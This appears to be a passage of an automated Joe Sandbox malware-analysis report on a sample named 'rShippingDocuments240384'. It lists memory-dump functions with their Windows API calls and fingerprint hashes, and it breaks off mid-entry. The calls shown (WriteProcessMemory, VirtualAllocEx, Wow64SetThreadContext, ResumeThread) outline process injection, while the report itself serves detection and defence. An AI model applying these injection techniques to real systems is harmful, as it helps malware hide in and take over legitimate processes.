WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07C3E180

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b8b44cda4ce245124b0e0743ab1c093426218dda2c8d72fdc62e634e6aff64fc
Instruction ID: acb851f1e20b62eaaae19d00a9a3e5897364917c5e35105cf6f33cf976a5da6b
Opcode Fuzzy Hash: b8b44cda4ce245124b0e0743ab1c093426218dda2c8d72fdc62e634e6aff64fc
Instruction Fuzzy Hash: 172125B1900349DFDB10CFAAC881BDEBBF5FF48310F14842AE919A7241C7799940CBA1

Function 0579CA10 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0579E8C6,?,?,?,?,?), ref: 0579E987

Memory Dump Source

Source File: 00000000.00000002.1491679501.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5790000_rShippingDocuments240384.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 90b8b8164bfe138fe0645ea9279d0db589a825946a77edf500bdde4edd07b476
Instruction ID: d462fb8633924932c6184533238fb1ba3ce163b55483c82f8af6773194aeca3f
Opcode Fuzzy Hash: 90b8b8164bfe138fe0645ea9279d0db589a825946a77edf500bdde4edd07b476
Instruction Fuzzy Hash: DC2105B5900309DFDB10CF9AD884ADEBBF9FB48320F14841AE918A3310C379A940CFA5

Function 07C3DB19 Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07C3DB9E

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 57b66a15ac36eb64919d324d493067baad90ba0950e1aee80ecd642533c0cf31
Instruction ID: f7282ac52ef504f4d68c0cebd7f21554340d1596220029c30bbdc09d654bec29
Opcode Fuzzy Hash: 57b66a15ac36eb64919d324d493067baad90ba0950e1aee80ecd642533c0cf31
Instruction Fuzzy Hash: 202137B19007099FDB10DFAAC485BEEBBF5AF88214F14842AD519A7240C7789945CFA1

Function 07C3E1E0 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07C3E260

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 353cafb090e3a1128194dfdf616d5835ebd7f30b9672869c11c13e4fc990fb0b
Instruction ID: d30a2236931084740d583bcbeb2fda7d0211e0602a30a70498d9ee65b4f755ab
Opcode Fuzzy Hash: 353cafb090e3a1128194dfdf616d5835ebd7f30b9672869c11c13e4fc990fb0b
Instruction Fuzzy Hash: E02114B1800349DFDB10CFAAC881BEEBBF5FF48310F14842AE919A7240C7799900CBA1

Function 07C3DB20 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07C3DB9E

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8899810da4a8856e81dc3f88fb7210a740f8d1b7390f0aebba5e939ed1e1fa6c
Instruction ID: 58c347388ce383bbff6a4b3f2c29ea207ff5fbcf4791ad728d67138497c6bc7b
Opcode Fuzzy Hash: 8899810da4a8856e81dc3f88fb7210a740f8d1b7390f0aebba5e939ed1e1fa6c
Instruction Fuzzy Hash: 552127B1D003099FDB10DFAAC485BEEBBF4EF88214F14842AD819A7240CB799945CFA5

Function 0579E8F8 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0579E8C6,?,?,?,?,?), ref: 0579E987

Memory Dump Source

Source File: 00000000.00000002.1491679501.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5790000_rShippingDocuments240384.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3106a30f9bd545ed6e645f4f421747e907848873c557cd56901e2500f9be068f
Instruction ID: 363c51a62ac2c195205da8136c6ecabcc32af9b8de371a468bfc52f0a6ff6425
Opcode Fuzzy Hash: 3106a30f9bd545ed6e645f4f421747e907848873c557cd56901e2500f9be068f
Instruction Fuzzy Hash: 0F21E0B5D00309DFDB10CFAAD584ADEBBF9FB48320F14841AE918A3210C379A944CFA5

Function 07C3E028 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07C3E09E

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e4489c86c99f7fcb00c44c4c9c32de0411e80ed271bac1f0555c475357035119
Instruction ID: 4cfdf73d2d31f547b34ffea98c0daf4684e8c95d63988c6efd0524ae714b7866
Opcode Fuzzy Hash: e4489c86c99f7fcb00c44c4c9c32de0411e80ed271bac1f0555c475357035119
Instruction Fuzzy Hash: 4D115972800349DFDB10DFAAD8457DFBBF5AB88310F148819D519A7250C7769541DFA1

Function 07C33F7B Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(00000000), ref: 07C33FF0

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: c0a8f73bbc396a026823ef706e5522f2215de397b9fe415e331f677c4295c1a0
Instruction ID: 014c611382c2266e69d514837dcabfa8f14d48a2cbf28853d8dfa4d72ced1663
Opcode Fuzzy Hash: c0a8f73bbc396a026823ef706e5522f2215de397b9fe415e331f677c4295c1a0
Instruction Fuzzy Hash: 801112B5D0465AABCB14CF9AD845BDEFBF4FB48720F14811AE818A7240C774A644CFA5

Function 07C3E030 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07C3E09E

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0753cf366e0177b14f6107ab40a5fdea91b61fc2979931e8598b3a20ad8a1cf6
Instruction ID: 88c1e70620cb4d81733c1a0821cef8a257075dca5250e82995cb337edc8875c4
Opcode Fuzzy Hash: 0753cf366e0177b14f6107ab40a5fdea91b61fc2979931e8598b3a20ad8a1cf6
Instruction Fuzzy Hash: 231126B1800349DFDB10DFAAC845BDFBBF5EB88310F148819E519A7250C7769540DBA1

Function 07C33F80 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(00000000), ref: 07C33FF0

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: d66b47e2b8ab023eff620f7691fff7390084cfd97dd1543be93170da690989ab
Instruction ID: f76a201e5db93a34d145cab29fd7c2ea8048f4d7e047eff56303d7e1bd804cf2
Opcode Fuzzy Hash: d66b47e2b8ab023eff620f7691fff7390084cfd97dd1543be93170da690989ab
Instruction Fuzzy Hash: A21132B5C0065ADBCB14CF9AD844B9EFBF4FB48720F10811AE818A7240C374AA00CFA1

Function 07C3DA69 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07C3DAD2

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 60914c382a3a6f740c22217f125f9f840086389b0fa62d9184b6278d99054e8d
Instruction ID: 8fd8b760d3ce57cd7f92c314c95acc2686400f85b50981e6264cd56d9c5ed560
Opcode Fuzzy Hash: 60914c382a3a6f740c22217f125f9f840086389b0fa62d9184b6278d99054e8d
Instruction Fuzzy Hash: 301158B1D00349CFDB20DFAAC44579FFBF5EB88210F148819C519A7340CB79A940CB91

Function 07C3DA70 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07C3DAD2

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 52ea5bb44ce07097cf0c38fa0f3b2757ebebd340d1f60081ca67f28883dfa50d
Instruction ID: dba9e1fed5a6005f1e93d205853f21c576c13f07856540e35557ed8e8558995a
Opcode Fuzzy Hash: 52ea5bb44ce07097cf0c38fa0f3b2757ebebd340d1f60081ca67f28883dfa50d
Instruction Fuzzy Hash: 6B113AB1D04349CFDB10DFAAC44579FFBF5EB88610F148419D419A7340C7796540CBA5

Function 09842AC8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 09842B2D

Memory Dump Source

Source File: 00000000.00000002.1494654658.0000000009840000.00000040.00000800.00020000.00000000.sdmp, Offset: 09840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9840000_rShippingDocuments240384.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: e5bd47870ac1b0e975c7d0ecc94cbb936d7d69a2ab46d511bcdee2f4098ba37e
Instruction ID: e833d578d62e4cc990b420c16975627d744299778b073dccfcaeb5f3a2ea4a5c
Opcode Fuzzy Hash: e5bd47870ac1b0e975c7d0ecc94cbb936d7d69a2ab46d511bcdee2f4098ba37e
Instruction Fuzzy Hash: 8D11CDB5800749DFDB20DF9AD985BDABBF8FB48720F20841AE518A7250C379A5448FA5

Function 09840CB8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 09842B2D

Memory Dump Source

Source File: 00000000.00000002.1494654658.0000000009840000.00000040.00000800.00020000.00000000.sdmp, Offset: 09840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9840000_rShippingDocuments240384.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: dce4d0ed877c6b0596f738ea6fdc47a2c66358aeca45c621987b380fbfadd94e
Instruction ID: 638c51b0a9c238a7d78539e99a2b668e85a509106945219c3feecee02ea14e74
Opcode Fuzzy Hash: dce4d0ed877c6b0596f738ea6fdc47a2c66358aeca45c621987b380fbfadd94e
Instruction Fuzzy Hash: 6811DFB5804748DFDB20DF9AD485B9ABBF8EB48310F108419E919A7210D379A944CFA1

Function 0579C238 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0579C29E

Memory Dump Source

Source File: 00000000.00000002.1491679501.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5790000_rShippingDocuments240384.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f82a3e67fc23490fd81b9e688e936773a86efac47fb05522272fb4b9ca6c5457
Instruction ID: 6269d5c63ffb229a5b0fc224a1fdff1b78ba37ae7dcf4cc27d6a7034706622ec
Opcode Fuzzy Hash: f82a3e67fc23490fd81b9e688e936773a86efac47fb05522272fb4b9ca6c5457
Instruction Fuzzy Hash: 8511DFB5C007498FDB14CF9AD444A9EFBF8AB88724F14842AD819A7210C379A545CFA1

Function 07C3402B Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 07C3408F

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: bcf52b0d10fb9da154a7040fab79d6605173ec18411bbfb76cbad07a19aac287
Instruction ID: 1c706bb03839d74cf2f04bae461b77cc0cf310cc66537bc4fc698342b893087f
Opcode Fuzzy Hash: bcf52b0d10fb9da154a7040fab79d6605173ec18411bbfb76cbad07a19aac287
Instruction Fuzzy Hash: 0A1136B1900649CFDB20CF9AC885BEEFBF4EB48310F24846AD418A7250C779A944CFA5

Function 07C34030 Relevance: 1.3, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 07C3408F

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: bc51289b52d7fd9bc8315919136bb2f06826e3c72715ed4ce903c87ff878660d
Instruction ID: a4b0bbd2f02a0bca3c14521914e1dd3c7a47f4b254e37f4b1375b77774911f60
Opcode Fuzzy Hash: bc51289b52d7fd9bc8315919136bb2f06826e3c72715ed4ce903c87ff878660d
Instruction Fuzzy Hash: 1D1148B1900749CFDB10CF9AC445BEEFBF4EB48320F14841AD518A7251D379A544CFA5

Function 0159D630 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1485212077.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_159d000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 742532a13dc898427b8fe664a78b3b5403682402c19770905dbec791c3764886
Instruction ID: 215e75e3a399045703f2007db08114b3aaa33bca24d7c29e17df37ec5fc597a9
Opcode Fuzzy Hash: 742532a13dc898427b8fe664a78b3b5403682402c19770905dbec791c3764886
Instruction Fuzzy Hash: 492100B2504244EFDF15DF94D9C0B2ABFB5FB88314F248569E9090F256C336D856CAA3

Function 017ED01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1485859055.00000000017ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 017ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ed000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 433c7dc5daa489cda59c90bb25ae556f6bd5f698a6aabc71ca3cff2fcea2d7b9
Instruction ID: 15a785d7964ead076bee336ac9f04fb6f067c9f13e43ce4e3efc783c6f19e3c2
Opcode Fuzzy Hash: 433c7dc5daa489cda59c90bb25ae556f6bd5f698a6aabc71ca3cff2fcea2d7b9
Instruction Fuzzy Hash: 5721D371604244DFDB25DFA4D988B16FFE5FB88214F28C5A9D8094B246C336D447CA62

Function 017ED1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1485859055.00000000017ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 017ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ed000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02ac04f0bfbb317d40e71cb62a2957859ecc8325a0c6d3a199b0fe5fdba16485
Instruction ID: 42decad127fcc101fc2b5cd0c9996fa3bfa121fb9cf506c28cfc7299faf17d2b
Opcode Fuzzy Hash: 02ac04f0bfbb317d40e71cb62a2957859ecc8325a0c6d3a199b0fe5fdba16485
Instruction Fuzzy Hash: C421F575508244EFDB25DFA4D9C4B25FBE9FB88324F24C5ADE8094F292C336D446CA62

Function 0159D62B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1485212077.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_159d000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
Instruction ID: 6daf4b042da542de9e789a8580b151fc685bb24c5e3894575c05be6b80b18811
Opcode Fuzzy Hash: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
Instruction Fuzzy Hash: 90119A76504284DFCF16CF54D9C4B1ABF72FB88324F2486A9D8090E657C33AD45ACBA2

Function 017ED1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1485859055.00000000017ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 017ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ed000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
Instruction ID: 2328da40b885eadb8f8850df0b695171991724133b4c050fcdfd82da897d9d01
Opcode Fuzzy Hash: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
Instruction Fuzzy Hash: 79118B75908280DFDB16CF54D5C4B15FFA1FB88224F24C6A9D8494B696C33AD44ACB62

Function 017ED017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1485859055.00000000017ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 017ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ed000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
Instruction ID: 191d9b5ac96a58592286d27fbeeac575b9f9ac09c375a2995dfa6ac3cddc28ba
Opcode Fuzzy Hash: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
Instruction Fuzzy Hash: 5911DD75504280DFCB22CF54D5C8B15FFA2FB88314F28C6AAD8094B657C33AD44ACBA2

Function 0159D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1485212077.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_159d000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30c297b718ff70a23011db91fd9111e18ec564178375e7e83b3dbccd3dc46fc2
Instruction ID: db60102bd2e6dde5e53518d1e40eb6a637de1879cc3df86dd684ae89daa45432
Opcode Fuzzy Hash: 30c297b718ff70a23011db91fd9111e18ec564178375e7e83b3dbccd3dc46fc2
Instruction Fuzzy Hash: 9F01F771004384AAEB104FA9CD84B6EBBE8FF41620F08C55AED080E283C2799400CA73

Function 0159D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1485212077.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_159d000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cedffbad2e5acf01edc0ea193eca3e4acdc0111435e621f1ce6ace24c3a778f
Instruction ID: 4348fe4f4034ae3c79cd9bbca90ad385c6753dcd201495c76576772eacbf046a
Opcode Fuzzy Hash: 9cedffbad2e5acf01edc0ea193eca3e4acdc0111435e621f1ce6ace24c3a778f
Instruction Fuzzy Hash: 18F06271405384AEEB118F5ADD84B6AFFE8EB41634F18C45AED085E287C2799844CAB2

Non-executed Functions

Function 07C3BF58 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

@"o, xrefs: 07C3C126

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID: @"o
API String ID: 0-438360675
Opcode ID: aa8f716f26c6f681b2c754cdd022b6ae9791fd7c0bbc543f2e8302207db593a6
Instruction ID: a0d127281a10a5abf7533e13392860788ee522f3d0daa921b2abde1aae0f8c85
Opcode Fuzzy Hash: aa8f716f26c6f681b2c754cdd022b6ae9791fd7c0bbc543f2e8302207db593a6
Instruction Fuzzy Hash: 4BE1E7B4E002198FDB24DFA9C580AAEBBF2FF89305F248159D815AB355D735AD41CFA0

Function 07C3DBF8 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

(3o, xrefs: 07C3DDC6

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID: (3o
API String ID: 0-4183215304
Opcode ID: 390fa39b46ef6d7ec78e7981e7bd6185de10d97ee9d0f31483ea6f03ba467483
Instruction ID: 6179a8f2cd1bf85a9a0b7a1472229a5784c26939b2c831f134c14024e68b42af
Opcode Fuzzy Hash: 390fa39b46ef6d7ec78e7981e7bd6185de10d97ee9d0f31483ea6f03ba467483
Instruction Fuzzy Hash: 0FE1E7B4E002198FDB14DFA9C580AAEBBF2FF89305F248169D815AB355D735AD41CFA0

Function 07C3BB20 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

| o, xrefs: 07C3BCEE

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID: | o
API String ID: 0-2740537620
Opcode ID: 84fe75107ec09ff012b54c74bd9798197bfb736c04fd3583fb6e017512e3f07f
Instruction ID: dda544c097d8e3ec63031b7acb975148012eb69b8197a0a617818034b8a8abd0
Opcode Fuzzy Hash: 84fe75107ec09ff012b54c74bd9798197bfb736c04fd3583fb6e017512e3f07f
Instruction Fuzzy Hash: D3E1D5B4E002198FDB14DFA9D580AAEFBB2FF89305F248169D815AB355D734AD41CFA0

Function 05794868 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1491679501.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5790000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3c1c97eb4e73ef255987b8b10c16feadc400ed330712d52099b5e661fe07b9c
Instruction ID: 949371e782dd174d0a9572df8f9d54cfe19c6e5fb613d4a00530de6e2a523c22
Opcode Fuzzy Hash: e3c1c97eb4e73ef255987b8b10c16feadc400ed330712d52099b5e661fe07b9c
Instruction Fuzzy Hash: 721296B0422B66CBE710CF65E88E1897FB1BB85318F51C209E2625F2E5DFB4154AEF44

Function 07C3B6E8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4108cf9bd2a3caa64606705d6dd2355ef5f19437ef86c8b9caba45a35ac39ad
Instruction ID: 581c9b7b4cdf42b68dbcaeffe8f2955ee8aec7e51bdd271b87cd4124e74c0377
Opcode Fuzzy Hash: f4108cf9bd2a3caa64606705d6dd2355ef5f19437ef86c8b9caba45a35ac39ad
Instruction Fuzzy Hash: 4CE1F6B4E002198FDB14DFA9C580AAEBBF2FF89305F248169D815AB355D734AD41CFA1

Function 07C32380 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 371b6af70fb112cf7b85dc83172e00a0c841cfdff78aa31108bee61065d70a9a
Instruction ID: 40a89e8e16a60e19b45d3e435a7899c556f57efd76751ae141b52dae1e6cd38d
Opcode Fuzzy Hash: 371b6af70fb112cf7b85dc83172e00a0c841cfdff78aa31108bee61065d70a9a
Instruction Fuzzy Hash: 8AE1E8B4E002198FDB14DFA9D580AAEFBB2FF89305F248169D815AB355D734AD41CFA0

Function 07C3D1F8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baf516b1bbcedae6f90ae54c8d061bd841094ef5df3017c9fa2f73c3bbaed6b6
Instruction ID: 3f199c5d386bc60c3cfa42dd82d2648f72b6b4eb989d867e46b17813e7f4c3a2
Opcode Fuzzy Hash: baf516b1bbcedae6f90ae54c8d061bd841094ef5df3017c9fa2f73c3bbaed6b6
Instruction Fuzzy Hash: 66E1E6B4E002198FDB14DFA9C580AAEBBF2FF89305F248169D815AB355D735AD41CFA0

Function 07C330F0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0c8e64c744011b2621eb1687d26d12bc17bf5686d3e032031dfa7e0117a2413
Instruction ID: d16e689b6e744195e26f84a47ab1d7b6840bc49b55c55b16ff11bd80977e2f8d
Opcode Fuzzy Hash: b0c8e64c744011b2621eb1687d26d12bc17bf5686d3e032031dfa7e0117a2413
Instruction Fuzzy Hash: 0FE109B4E002598FDB14DFA9C580AAEFBB2FF89305F248169D814AB355D735AD41CFA0

Function 07C31F43 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93c00cb72980b0579851f0a9b9e9b1721edbad9fd53a02470df13c17eb31515d
Instruction ID: 7565ccabc9c643a72877724e4ade71c4f26de4c17290037a63f5fa73a0cbed1a
